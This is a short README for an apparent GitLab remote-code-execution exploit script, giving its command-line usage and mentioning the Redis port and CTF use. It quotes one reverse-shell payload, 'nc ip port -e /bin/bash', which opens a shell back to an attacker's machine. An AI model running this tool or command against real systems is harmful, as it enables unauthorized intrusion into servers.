dotPY-hax/gitlab_RCE/README.md

   python gitlab_rce.py target-url(http://gitlab:port) local-ip

   You might or might not have to tweak this a bit.
 For example the redis port (6379) might be different for your target or you might want to change the payload "nc ip port -e /bin/bash" might only work in some CTFs - I would have used a more common reverse shell but the characters mess with encoding.

+THERE ARE ABSOLUTELY !!NO!!
+CHECKS OR ERROR HANDLING!